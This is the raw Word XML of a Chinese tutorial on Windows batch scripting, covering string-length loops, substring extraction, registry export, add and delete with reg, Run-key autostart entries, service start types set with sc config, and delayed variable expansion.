        <w:t>计算字符串长度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="图片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r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>没有现成的函数。如下程序利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> goto</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>形成循环，不断将字符串截短</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，并记录截短的次数，到字符串变成空时的次数即长度。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       set testStr=This is a test string</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> testStr </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>复制到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>str</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">str </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>是个临时字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       set str=%testStr%</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>标签，用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>goto</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>跳转</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       :next1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>判断</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>str</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>是不是空，如果不是则执行下边的语句</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       if not "%str%"=="" (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>算术运算，使</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>num</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的值自增</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，相当于</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>num++</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>++num</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       set /a num+=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>截取字符串，每次截短</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       set "str=%str:~1%"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>跳转到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>next1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>标签</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>这里利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>goto</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>和标签，构成循环结构</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       goto next1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       )</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       :: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>当以上循环结构执行完毕时，会执行下边的语句</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       echo testStr=%testStr%</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       echo testStr</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的长度为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>%num%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0"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r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    5) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>截取字符串时，需要传递参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>直接</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> echo %args:~%num%,-5% </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>没办法想要的字符串，需要如下两步</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">       setlocal enabledelayedexpansion</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       echo !args:~%num%,-5!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>六、注册表操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>备份注册表，将</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>[HKEY_LOCAL_MACHINE ... Run]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的内容，备份到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“c:\windows\1.reg”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">       reg export HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c:\windows\1.reg</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       reg export HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run c:\windows\2.reg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>添加注册表内容</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>一般的添加或修改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">       reg add "HKCU\Environment" /v Java_Home /t reg_sz /d "D:\Java\jdk1.6.0_07" /f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>上句解析：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“HKCU”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“HKEY_CURRENT_USER”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的缩写，不用缩写用全称也可以；</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>添加名称为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“Java_Home”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的变量；类型为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“reg_sz”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，另一种常见类型是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“reg_dword”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>；值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> D:\Java\jdk1.6.0_07</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       b.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>使用变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">         set SoftWareHome=HKEY_LOCAL_MACHINE\SOFTWARE\JavaSoft\Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         reg add "%SoftWareHome%Web Start\1.6.0_07" /v Home /t reg_sz /d "%cd%\jre1.6.0_07\bin" /f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       c.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果注册表的名称有空格，或者数据用特殊符号时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="图片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r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">       reg add "%SoftWareHome2%\HelpCommands" /v "01:Online Documentation" /t reg_sz /d "\"%cd%\Documentation\Index.htm\"" /f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>传入值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>值用双引号括起来的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>"D:\ProgramFiles\1.work_soft\Sybase\PowerDesigner_12\Documentation\Index.htm"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         reg add "%SoftWareHome2%\Paths" /v ReportTemplates /t reg_sz /d "%cd%\Resource Files\Report Templates\\" /f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>传入值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(“\”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>结尾的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> E:\Holemar\1.notes\90. Windows\Resource Files\Report Templates\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="图片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84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       d.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>增加空的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">         reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\IMJPMIG8.1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       e.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>添加或修改默认值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">         reg add "%vpath%InstallPath" /ve /t reg_sz /d "%cd%" /f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>这里用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“/ve”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>来代替一般修改时的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">“/v </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>变量名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>”,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>即可修改默认值了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    3) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除注册表的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>双引号里面的是注册表的目录，下面两句将删除这目录下的所有信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      reg delete "HKEY_CURRENT_USER\Software\RealVNC" /f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC" /f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>双引号里面的是注册表的目录，下面一句将删除这目录下指定的某个信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      reg delete "HKEY_LOCAL_MACHINE\Software\RealVNC" /v VNC_Server /f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    4) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>注册表的常用位置</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>系统启动项：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">     example: REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v VNC_Server /t REG_SZ /d "%cd%\VNC_Server.bat" /f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       b.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>系统环境变量：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       c.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>当前用户的环境变量：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">         [HKEY_CURRENT_USER\Environment]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    5) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>修改注册表之后，结束并重新加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>explorer.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>进程，可刷新注册表，令其生效</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">       taskkill /f /im explorer.exe &gt;nul</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       start "" "explorer.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>七、系统服务</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>停止服务：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">NET STOP </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>启动服务：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">NET Start </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>设置启动类型</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>自动：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  SC CONFIG </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> START= auto</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>手动：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  SC CONFIG </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> START= demand</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>已禁用：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">SC CONFIG </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>服务名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> START= disabled</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>附：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“START= ”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>等号后面必须要有一个空格。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(start</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>还有</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>boot,system</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>两个值</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       Sample:  SC CONFIG Spooler START= demand (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>打印机加载项，设置成手动，默认自动</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">    3) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看系统服务：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>start %SystemRoot%\system32\services.msc /s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>八、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>setlocal</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>与变量延迟</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  0) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在没有开启变量延迟的情况下，某条命令行中的变量改变，必须到下一条命令才能体现。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>另外例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令等，其后用一对圆括号闭合的所有语句也当作一行。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       set a=4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       set a=5 &amp; echo %a%</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>结果：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>也可以对这种机制加以利用，如下的变量交换</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     example:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       set var1=abc</w:t>
      </w:r>
